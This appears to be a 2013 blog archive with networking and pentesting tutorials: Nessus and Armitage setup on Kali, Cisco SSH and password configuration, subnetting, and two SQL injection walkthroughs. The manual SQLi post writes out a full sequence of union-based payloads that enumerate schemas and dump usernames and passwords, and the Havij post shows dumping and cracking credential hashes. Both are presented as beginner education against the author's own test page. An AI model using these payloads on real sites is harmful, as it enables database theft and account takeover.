Archives

All posts for the month August, 2013

Nessus is a vulnerability scanner. My first disappointment  with Kali is that it excluded nessus from its vulnerability scanning tools. However it can be installed. Let us see how to install Nessus in Kali Linux. This guide works for all versions of Kali Linux. First download the nessus debian package from the website ( here ). Go to the directory into which the package has been downloaded. It should normally be in the Downloads directory in root directory.  Open a terminal, navigate to the “Downloads” folder and type “ls“. You can see the debian package of Nessus. Then type the command “dpkg -i  package name” as shown below.

nessuskali1

Then type command “service nessusd start” to start the service.

nessuskali2

Open a browser and type “https://kali:8834/” to see the web interface of nessus. You will see the below warning that the connection is untrusted.  Click on “I understand the risks” option.

nessuskali3

 

You will get a popup to confirm the security exception. Click on that option.

nessuskali4

Then you will get a welcome screen of nessus as shown below. Click on “Continue”.

nessuskali5

Its time to create our initial account. Type the username and password you want to set up for the account. Click on Continue.

nessuskali6

Its time to enter the activation code for Nessus. You can get the activation code from here. After entering activation code, click on Continue.

nessuskali7

After activation is completed, it will download the nessus packages required. It may take a bit long time.

nessuskali8

Then we need to wait some more time while the program initializes.

nessuskali9

After the initialization is over, you will see the Nessus scan page as below.

nessuskali10

Congrats, you have successfully installed Nessus in Kali Linux.

 

Imagine you are a network administrator in a large organization with number of switches and routers. To configure a switch or router on a far off location, there are two choices. One is to go near the switch or router to configure it. This is good but imagine how much trouble it is  to go near each and every device to configure it. The second and easy option is the remote configuration of the switch or router.

Remote configuration of a switch/router can be done using telnet or ssh protocols. But using telnet has a disadvantage. It sends data in plain text. So if you happen to type a username ad password for authentication with the switch from a remote location, it will be passed in plain text and anyone sniffing on the network can easily find out your login credentials. This is a big security risk. To overcome this problem, we should use ssh protocol for remote configuration of the switch or router.  SSH protocol is as same as telnet but it uses encryption during the communication. This makes it difficult for hackers to detect the credentials. Let’s see how to enable ssh on cisco routers and switches using IOS. Here I am using a router.

ciscossh1

 

The command “conf t” enables global configuration mode of the switch or router. The “hostname R1″ command changes the default name of router to R1. The name of the router is used to generate names for the keys  by the ssh protocol. So it is necessary to change the default name of the router. The “ip domain-name shunya.com” command sets the domain name for the router. The domain name is also needed for setting name for encryption keys. ( Shunya.com is a fictional domain name I used. you can use your own domain name ).  It’s  time to set login credentials on the router. The “username admin password 123456″ command sets the username and password to admin and 123456 respectively. The “line vty 0 15″ command selects the vty lines from 0 to 15 for line configuration. The “login local” command sets the login to local router. The “exit” command takes us out of the line configuration mode to global configuration mode. it’s time to generate ssh keys.

ciscossh2

 

The “crypto key generate rsa” command generates the cryptographic keys using Rivest Shamir Adlemann algorithm. You will be prompted to enter the number of bits in the modulus. Setting it too low will be too easy to crack. Setting it too high will be time consuming. I set it to 1024.

Let’s see the information about ssh protocol we enabled on the router.

ciscossh3

 

The “show ip ssh” command does this. The reason for prepending this command with “do” is that the “show ip ssh”  is a privileged exec mode command and cannot be executed in global configuration mode. We can also see from the information displayed that the authentication timeout has been set to 120 secs and authentication retries are set to three. Let’s change them. The command “ip ssh time-out 60″ command changes authentication time-out  to 60 secs.  The command “ip ssh authentication-retries” command is used to change the authentication retries.

Finally we will have to set ssh as input transport protocol on vty access lines.

ciscossh4

 

The “line vty 0 15″ command selects all the vty lines. The “transport input ssh” command sets ssh as a input transport protocol.  The “exit” command as already said takes us out of the line configuration mode. We have successfully enabled ssh protocol on our router.

Let’s once again see the information about the ssh we just enabled using “do show ip ssh”.

ciscossh5

 

We have seen how to set passwords on cisco switches or routers here. Of course setting passwords does add to the security of the device but there is small problem. The password is stored in plain text.  Anyone who gets access to the switch can easily see all the passwords by typing command “show running-config or show startup-config”. Today we will see how to encrypt passwords on Cisco routers and switches.

encisco1

Encrypting passwords can further enhance the security of the device. Privileged password can be encrypted by using the command “enable secret” instead of “enable password”. This command should be set from privileged global configuration mode.

encisco2

Lets see what can we see  when we use the command “show running-config”.

encisco3

We can see that the password we set has been encrypted. but what about other passwords. The  console, auxiliary and vty lines passwords cannot be encrypted even if we use “enable secret” command. To encrypt those passwords, we have to use another command “service password-encryption” as shown below.

encisco4

This command will encrypt all the passwords stored in plain text on the device.

NOTE : This is strictly for educative purposes.

 

Havij is an automated SQL injection tool. To say in the own words of its creators,

” Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands. ”

It is available both in free and commercial versions. Today we are going to see how to dump the contents of a database using Havij. For this I am going to use the free version. First download Havij from here and install it. Then open it and enter the vulnerable page url in the target column ( for this tut I am using my own vulnerable webpage ).

havij1

 

Set the database option to ‘auto detect‘ and hit analyse. This should show you the current database name as shown below.

havij2

 

Click on the “info” tab. This will show you information about the victim’s system. We can see information like Host IP address, web server version etc.

havij3

 

Click on the “Tables” tab.

havij4

 

Click on “Get DBs” option. This will list all the databases as shown below.

havij5

 

To get tables in a specific database, select the database and click on Get Tables”. This will list all the tables present in the selected database. I selected database “shunya” here.

havij6

 

We can see that there is on table ‘users’ in our database ‘shunya’ .To get columns , select the table ‘ users’ and click on “Get Columns”.

havij7

 

Thia will list all the columns in the table. We can see that we have five columns in the table ‘users’.all the columns. It’s time to dump the values of columns. Select the columns whose data we want to dump and click on Get data”. Here I selected all the columns.

havij8

 

We got all the data including usernames and passwords. But passwords seem to be encrypted. No problem. Click on the password hashes and copy them. Then click on MD5″ tab and paste the password. Click on “Start”. Havij automatically decrypts the password for us. Decrypt all passwords in the similar manner.

havij9

 

Click on “Find admin”. This option finds the admin  page of the website automatically. When it finds the admin page, you can try the username and passwords to get access to the website. Hope this was helpful.

havij10

 

Here’s a video version of this howto.

 

Good evening friends, Today we will see how to configure passwords on Cisco routers and switches. Cisco devices have four types of passwords.

  • Console password : Used to set password for the console access.
  • Auxiliary password : It is used to set password to auxiliary port ( if the switch has one.)
  • VTY lines password : Used to set password for  for telnet and ssh access.
  • Privileged password : Used to set password for privileged access to the switch.

I am not going to show you how to set up auxiliary password here. To see how to set up console password and VTY lines password, go here.

Privileged mode of a Cisco device has some advanced IOS commands that can have disastrous consequences if used by wrong hands. So it is very important to set up a password to access privileged commands. Use the following commands

ciscopass1

 

The “enable” command takes us into privileged mode. The “conf t” mode takes us into global configuration mode which pertains to the configuration settings of the whole switch. The “enable password”  sets a password for the privileged mode. ‘123456’ is the password. The “exit”  command takes us out of the privileged mode. To see if a password has been set for the privileged mode, try entering into privileged mode by typing “en” command. We can see that it prompts us for the password.

There are many articles on internet on SQL injection but most of them only give you queries and don’t display the ensuing result. So here, I have made a miniscule attempt to explain sql injection for beginners. For this, I have made my own webpage vulnerable to SQL injection and hosted it on Wamp server.  I hope this will be helpful for beginners to understand sql injection.

Imagine any hacker searching for sql vulnerable sites using google dorks comes to this website shown below.

sqlb1

The above is a webpage displaying some sort of information about the company’s founders.  What happens when we click on “Founder 1″? It displays some information about Founder 1 as shown below.

sqlb2

Notice that there is a small change in the url. it says id=1 at the last.  Now what if we go back and click on “Founder 2”,  it displays information about founder 2 and the url changes to ‘id=2. This implies that the webpage is using PHP $_GET query to fetch data from database.

sqlb3

Well let’s see if the webpage is vulnerable. In the address bar, add a single quote after the id=1. like below

“id=1”

sqlb4

If you get an error as shown above, then the site is vulnerable to sql injection. Since we know this site is vulnerable to sql injection, lets’ see the number of columns in the database. Use the query

id=1 order by 1 

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value without the error are the number of columns present. The ‘order by’ query in SQL is used to sort the data. When no option is specified it sorts in ascending order by default. Sometimes you may not see any error no matter how much you increase the value, like the case below where I have not received an error until the value of 15.

sqlb5

Maybe there are fifteen columns ( the chances are very low though) or our query is not working. Let’s use another query.

id=1′ order by 1–+ 

We can see below that the value 3 returns us an error like below. This means there are two columns.

sqlb6

 

If the latter query works then you should use it all through the injection. The characters ‘–‘ comment the code after them.

Now we know there are  two columns. Let’s find out the vulnerable columns in the website.Type

id=-1′ union select 1,2–+ 

The vulnerable columns are displayed as below. Here both the columns are vulnerable but you may not be so lucky all the time.

sqlb7

If the above query doesn’t work, use

id=1′ and 1=2 union select 1,2–+

sqlb8

Now let’s find out the database version. We already know the number of columns. Use query,

id=-1′ union select version(),2–+

sqlb9

The version is 5.6.2-log. Now let’s find out the names of all the databases present. Use query,

id=-1′ union select group_concat(schema_name),2 from information_schema.schemata–+

This will display all the databases. You can see the list of databases present below. You can see dvwa database which I used earlier for practice.

sqlb10

We know all the databases. Now let’s see the database being used by our website. Use query,

id=-1′ union select database(),2–+

sqlb11

 

So, Shunya is the database being used by our website. Let’s see the current user.

id=-1′ union select user(),2–+

sqlb12

We know root is the default user on wamp server. Now let’s find out tables present in the ‘shunya’ database.

id=-1′ union select group_concat(table_name),2 from information_schema.tables where table_schema=database()–+

sqlb13

The table name is ‘users’. Now let’s find out the column names in the table ‘users’.

id=-1′ union select group_concat(column_name),2 from information_schema.columns where table_schema=database()–+

sqlb14

We got the column names. Now let’s dump the values of some interesting columns. Let’s dump “username” and “password” values.

id=-1′ union select group_concat(username,0x3a,password,0x3a),2 from users–+

sqlb15

We successfully dumped the usernames and passwords. The value 0x3a introduces a colon between the dumped values for readabiltiy. Now let’s dump all the values from the table ‘users’.

id=-1′ union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password,0x3a,),2 from users–+

sqlb16

We have successfully performed sql injection and dumped the values. Hope this was helpful.

Basic configuration of a Cisco switch can be done  in three ways, using Cisco Device manager web tool, using Cisco Networking Assistant(CNA) and Cisco IOS setup mode. The first two are GUI tools and the latter is a CLI option. Since Cisco IOS plays a very important part in CCNA exam,  we are going to see how to configure a switch using Cisco IOS setup mode commands.

In this tut, we are going to configure the name of the switch, set management ip address to the switch, configure console and telnet passwords and lastly configure message of the day banner for the switch. To configure a Cisco switch using Cisco IOS, we must connect a computer to the console part of the switch using a rollover cable. For this article however, I am going to use Cisco Packet Tracer software.

bcos1

Naming the switch: 

Naming the switch can ease management and identification of the switch. Run the following commands for naming the switch. A switch can be named using “hostname” command.

bcos3

 

The first two commands allow us to access the global configuration of the switch. If you are not aware of different modes of a Cisco switch, see here. The “hostname” command renames the switch. The rest of the commands are used to exit from global configuration mode.

Configure management IP address:

Configuring management IP address to the switch allows us to connect to the switch from remote locations using either Telnet or HTTP. To configure management IP address on the switch, run the folllowing commands.

bcos4

 

The first two commands (“en” and “conf t”) set the IOS in privileged global configuration mode. This mode enables us to run commands that configure switch settings that apply to the whole switch.

The “interface vlan1″ command selects an interface to work with.  VLAN 1, is  called the management VLAN and is reserved for management of the switch.  We set IP address and the management default IP gateway on this Vlan.

“ip address 10.10.10.3 255.0.0.0” command sets the ip address and the subnet mask of the switch on interface vlan1. The no shutdown command turns on the interface vlan1. The exit command brings us back into global configuration mode from specific configuration mode.

The “ip default-gateway 10.10.10.1″ command sets the default gateway of the switch to 10.10.10.1 . We can see that we first exit from the interface configuration mode ((config-if)# exit) because the default gateway applies to the whole switch, not just to an interface.

Configuring Console password:

To set up a console password on the switch, run the following commands.

bcos5

 

The “line console 0″ command selects the console line. There is only one console line on a cisco switch. The “password 123456″ command sets the password of the console line to 123456. The “login” command instructs the IOS to prompt for authentication when somebody logs into console line.

Configuring telnet password:

To configure telnet password on the switch, run the following commands.

bcos6

 

The “line vty 0 ?” command shows the number of vty lines available on the switch. The response <1-15>  shows that 15 VTY lines are available, which means we can have 15 simultaneous sessions on this switch.  We will configure telnet password on line 1. The “line vty 1″ command selects the line 1. The “password telnet” command sets the telnet password of the line to telnet. The “login” command instructs the IOS to prompt for authentication.

Configuring banners:

Banners can be used to display a brief message about the switch when someone logs in. It helps identifying the switch we log into and its configuration and usage guidelines. We can also add a security warning in the banner message to warn users against unauthorized access to the switch. We should run the following commands to configure banners on the switch.

bcos7

 

We will configure message of the day on the switch. The “banner motd -“ command ( note that there is a space between motd and – ) is used to configure the message of the day banner on the switch. When we run this command, it prompts us to enter the message whcich should be ended by .

This is the basic configuration of he switch. Hope this was hepful.

If you tried to start armitage on Kali Linux, it will show you the following error.

armitage1

 

The error says that the service cannot connect to the database. Now let’s see how to configure armitage on Kali Linux. First, lets check if armitage is installed on our machine or not. Open terminal and type the command “apt-cache search armitage”Then type the command “apt-get install armitage”. If everything is right, it tells you that armitage is already installed.

 

armitage2

Now let’s rectify the database connection problem. Type the command “service postgresql start”. This will start our database service. Then start metasploit service by typing the command “service metasploit start”

armitage3

Then type the command “armitage”. You should successfully see armitage working.

armitage4

 

 

Understanding subnetting is very important not only for those preparing for CCNA exam but also network administrators. Today, I am going to teach you how to create a subnet in a network. For this, I will use Packet Tracer software. To know what is subnetting and why we need it go here. So let’s start.

Imagine I formed a small software company named shunya whose network looks like below. I hired one Java developer, one software tester, one HR and one network administrator. I have been assigned the IP address range from 192.168.10.1 to 192.168.10.255.

subnet1

 

I have enabled DHCP on my router as below.

subnet2

 

subnet3

After one year, imagine my company has received Abrahamic blessings from GOD and has seen rapid growth. Now the company has three Java developers, three software testers and  a dedicated HR team. Not only that, my company now has moved into Remote Infrastructure Management(RIM) and has a Network Operation Center(NOC) and Security Operation Center(SOC).  Total I have 15 computers in my network which looks like below.

subnet4

 

Now see the image below. Here the machine “JD1″ sends a packet to machine “Testing3″. We can see here that for communication between machines “JD1: and “Testing3″ other machines have also been disturbed.

subnet5

 

So for this reason, I decided to subnet the network. I decide to divide the network into three subnets as shown below.

subnet6

 

To create a subnet, first we need to have proper planning as to how many subnets we need and how many we may need in the future. Presently, I need three subnets. The number of subnets should always be calcutated in the powers of 2.

2 to the power of 1 = 2

This doesn’t satisfy our requirement as we need three subnets.

2 to the power of 2 = 4

This satisfies our requirement. So we need to take two bits from the host portion of the IP address. 192.168.10.1 to 192.168.10.255 is the address range available to us with subnet mask 255.255.255.0,  Writing the subnet mask in the binary notation, it is

11111111 11111111 11111111 00000000

 255            255          255             0  

The first 24 bits are network bits and the last eight bits are host bits. To create three subnets, we need to take two bits from the host portion of the address as explained above.

11111111 111111111 11111111 11000000

   255              255            255         192

Four subnets which can be created from the above subnet mask are,

192.168.10.0 to 192.168.10.63 ( with host bits 00000000 )

192.168.10.64 to 192.168.10.127 ( with host bits 01000000 )

192.168.10.128 to 192.168.10.191 ( with host bits 10000000 )

192.168.10.192 to 192.168.10.255 ( with host bits 11000000 )

Since we require only three subnets, we will create the first three subnets. The first subnet ( 192.168.10.1 to 192.168.10.63 ) comprises of Java Developers and Software testers. The commands are as below on the interface.

subnet7

 

If you go to any machine on this subnet and look at its IP address, it will be like below.

subnet8

Now the subnet for the Human Resource Department ( 192.168.10.128 to 192.168.10.191 ) . This will be like below.

subnet9

 

 

subnet10

 

The third subnet ( 192.168.10.64 to 192.168.10.127 ) comprises of NOC and SOC.

subnet11

 

 

subnet12

 

 

Now our network has been successfully subnetted into three subnets and we still have another subnet to use for future use.

subnet13

 

 

Hope this was helpful. If you have any doubts regarding this article please comment below. Thank you.